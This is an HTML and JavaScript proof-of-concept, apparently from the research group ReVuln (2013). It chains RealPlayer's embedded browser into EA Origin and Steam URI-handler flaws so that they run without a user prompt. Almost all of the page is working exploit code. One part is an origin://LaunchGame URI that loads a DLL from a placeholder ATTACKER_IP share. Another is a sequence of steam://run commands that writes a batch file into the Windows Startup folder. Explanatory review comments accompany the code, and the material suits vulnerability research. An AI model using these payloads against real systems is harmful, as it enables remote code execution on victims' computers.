revuln

Bypassing prompts of Origin & Steam links (via RealPlayer)

Mar 20th, 2013
<!--
  ReVuln proof-of-concept (2013): launching the `origin://` and `steam://`
  URI handlers without the browser's "open external application?" prompt.

  Flow, as implemented below:
    1. On the first load (no `#rp` fragment) the page asks the RealPlayer
       browser plugin (<object type="application/vnd.rn-realplayer-javascript">)
       to re-open this same URL, plus `#rp`, inside RealPlayer's embedded
       browser via OpenURLInPlayerBrowser().
    2. On the second load (fragment present, i.e. running inside RealPlayer's
       browser) the script navigates to an `origin://LaunchGame/...` URI and
       then to three `steam://run/...` URIs on timers.

  NOTE(review): step 1 depends on the RealPlayer plugin being installed and
  scriptable from the page; if it is absent or blocked, `test` has no
  OpenURLInPlayerBrowser method and the first branch throws. The page never
  checks for that.
-->
<html>
<body>

<!-- Hidden RealPlayer plugin instance; only its scripting interface is used. -->
<object
    id="test"
    type="application/vnd.rn-realplayer-javascript"
    width="0" height="0">
</object>

<script type="text/javascript">

    // Credits:
    //   ReVuln
    //   revuln.com
    //   twitter.com/revuln

    // The embedded browser in RealPlayer opens any registered URI scheme
    // without prompting the user (Safari behaved the same way at the time).
    // It is used here as an unprompted trigger for the Steam and Origin
    // URI-handler issues described in the linked whitepapers.

    // Marker fragment: absent on the first (normal browser) load, appended
    // to the URL that is re-opened inside RealPlayer's browser, so the same
    // page can tell which context it is running in.
    var check_if_rp = '#rp';

    if(document.location.href.indexOf(check_if_rp) < 0) {

        // browser: first load, no fragment yet
        document.write("BROWSER");

        var test = document.getElementById('test');

        // open the RealPlayer browser on this same page, fragment added so
        // the second load takes the else-branch below
        test.OpenURLInPlayerBrowser(
            document.location.href + check_if_rp
        );

    } else {

        // RealPlayer: second load, running inside the embedded browser
        document.write("REALPLAYER");


        // Origin vulnerability
        //  http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf
        // exploit the openautomate option of Crysis 3 and 2,
        // Battlefield 3 and others like RE5 and DMC4
        //
        // The numeric lists below are Origin game/content IDs that get joined
        // into a single comma-separated LaunchGame URI. `CommandParams` passes
        // `-openautomate` with a UNC path; note the JS escaping: the literal
        // '\\\\ATTACKER_IP\\evil.dll' becomes \\ATTACKER_IP\evil.dll at
        // runtime. ATTACKER_IP is a placeholder, not a real host.

            var crysis  = '71503,71505,71645,71656,71708,71709,71710,71711,71779,1003897,1003898,1004521';
            var bf3     = '70619,71067,71171,71633,1000689';
            var others  = '71604,71606,71716,71613,1004689';

            window.location =
                    'origin://LaunchGame/'
                  + crysis
            + ',' + bf3
            + ',' + others
                  + '?CommandParams= -openautomate \\\\ATTACKER_IP\\evil.dll';


        // Steam vulnerability... yes, Steam IS still vulnerable
        //  http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
        // the following is the "original" PoC used in our video and shown at
        // BlackHat Europe 2013
        //
        // All three use steam://run/440 (app ID 440) with extra command-line
        // arguments after the `//`. In the URL-encoded strings `%2b` is `+`
        // (a Source-engine console command prefix) and `%5c` is `\`.
        // NOTE(review): the con_logfile path in do2() is hard-coded to an
        // XP-era "Documents and Settings\Administrator" layout, so that step
        // only applies to a machine with exactly that profile path.

            function do1() {
                // start the game with -hijack and the developer console
                window.location='steam://run/440// -hijack -dev';
            }
            function do2() {
                // redirect the console log to a file in the Startup folder
                window.location='steam://run/440// -hijack %2bcon_logfile "%5cDocuments and Settings%5cAdministrator%5cStart Menu%5cPrograms%5cStartup%5cx.bat"';
            }
            function do3() {
                // write "calc" into that log file, then quit
                window.location='steam://run/440// -hijack %2becho calc %2bquit';
            }

            // Stagger the three launches (0 s, 20 s, 22 s) so each reaches a
            // running game before the next is sent. The string form of
            // setTimeout is evaluated as code at fire time; passing the
            // function references (setTimeout(do1, 0)) would be equivalent.
            // NOTE(review): the Origin navigation above has already been
            // issued when these timers are armed; the PoC relies on a
            // custom-scheme navigation not unloading the page.
            setTimeout("do1()", 0);
            setTimeout("do2()", 20000);
            setTimeout("do3()", 22000);

    }

</script>

</body>
</html>